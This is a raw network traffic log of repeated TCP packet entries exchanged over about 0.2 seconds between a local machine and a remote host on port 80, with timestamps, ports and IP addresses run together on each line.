                                        Sep 14, 2024 18:31:11.605703115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605705023 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.605719090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605747938 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.605797052 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605807066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605818033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605828047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605839968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605926991 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.605951071 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605959892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605967045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605973005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605983019 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605993986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606004953 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606017113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606040955 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.606071949 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.606091976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606101990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606117010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606127024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606195927 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.606244087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606255054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606266022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606275082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606285095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606297016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606353045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.606388092 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.606394053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606406927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606417894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606429100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606441021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606451035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606528997 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.606946945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606956959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.606967926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607039928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607058048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607069016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607079983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607091904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607110023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607116938 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607150078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607161045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607178926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607186079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607188940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607201099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607220888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607245922 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607259035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607270002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607280970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607290983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607302904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607310057 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607325077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607359886 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607393026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607402086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607413054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607429981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607446909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607455969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607459068 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607491016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607501030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607503891 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607512951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607527018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607537031 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.607548952 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607583046 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.607583046 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.616574049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616585016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616596937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616652966 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.616664886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616676092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616687059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616698027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.616749048 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.616780043 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.645741940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645751953 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645762920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645843029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645852089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645862103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645870924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645879030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.645950079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.645950079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.645950079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688446999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688457012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688466072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688474894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688484907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688496113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688512087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688519955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688535929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688549042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688555956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688599110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688608885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688617945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688631058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688636065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688631058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688631058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688647032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688718081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688726902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.688728094 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688728094 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688729048 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.688766003 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.689064026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689074993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689090014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689122915 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.689161062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689171076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689179897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689191103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689198971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.689212084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.689245939 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.690968990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.690978050 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.690988064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691026926 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.691065073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691076994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691086054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691096067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691106081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691127062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.691164017 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.691164017 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.691869020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691879034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691889048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691898108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691907883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691916943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691926956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691927910 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.691936016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.691962957 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.691994905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.692699909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692712069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692723989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692764044 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.692801952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692814112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692823887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692836046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692847013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692859888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.692889929 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.692926884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692939043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692949057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.692961931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693000078 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693023920 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693032026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693043947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693054914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693067074 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693087101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693119049 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693154097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693166018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693176985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693188906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693200111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693208933 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693211079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693252087 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693284988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693389893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693401098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693411112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693422079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693433046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693442106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693444967 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693455935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693468094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693475962 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693480015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693492889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693504095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693515062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693521023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693535089 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693572998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693584919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693587065 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693624973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693824053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693862915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693873882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693909883 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.693948030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693958998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693983078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.693995953 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694000959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694013119 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694021940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694031954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694035053 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694044113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694055080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694070101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694075108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694087982 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694092035 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694098949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694112062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694133043 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694153070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694184065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694195032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694205046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694215059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694226027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694235086 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694242954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694253922 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694256067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694267988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694313049 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694343090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694358110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694432020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694442987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694453955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694464922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694474936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694485903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.694489956 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694523096 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.694552898 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.701803923 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.703360081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703368902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703378916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703402996 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703416109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703428984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703443050 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.703461885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703474045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.703494072 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.703525066 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.734209061 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734340906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734350920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734361887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734371901 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734384060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734395027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734400988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.734405994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.734502077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.734502077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.779681921 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779697895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779710054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779720068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779731989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779741049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779747963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779758930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779768944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779779911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779791117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779800892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779814959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779831886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779843092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779854059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779863119 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779874086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779886961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.779887915 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.779984951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.779984951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.779984951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.779984951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.779984951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780380011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780396938 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780409098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780420065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780431032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780441999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780452967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780457020 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780468941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780479908 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780481100 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780491114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780503035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780503988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780514002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780527115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780535936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780546904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780548096 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780558109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780567884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780591965 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780621052 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.780881882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780934095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780944109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780961990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780978918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.780983925 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781014919 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.781022072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781033993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.781074047 CEST4973880192.168.2.4172.67.203.195
